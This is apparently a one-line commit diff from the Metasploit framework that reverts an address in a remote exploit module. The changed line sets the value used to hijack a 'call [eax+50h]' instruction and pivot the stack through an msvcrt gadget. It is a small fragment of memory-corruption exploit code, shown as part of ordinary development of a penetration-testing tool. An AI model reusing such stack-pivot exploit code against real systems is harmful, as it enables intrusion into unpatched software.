Full revert the change

bug/bundler_fix
jvazquez-r7 2013-11-25 22:04:02 -06:00
parent fa97c9fa7c
commit 0079413e81
1 changed files with 1 additions and 1 deletions

View File

@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Gain control of the call [eax+50h] instruction # Gain control of the call [eax+50h] instruction
# XCHG EAX, ESP; RETN msvcrt # XCHG EAX, ESP; RETN msvcrt
buf[0x4874, 4] = [0x12dd0700-0x50].pack('V') buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
buf buf
end end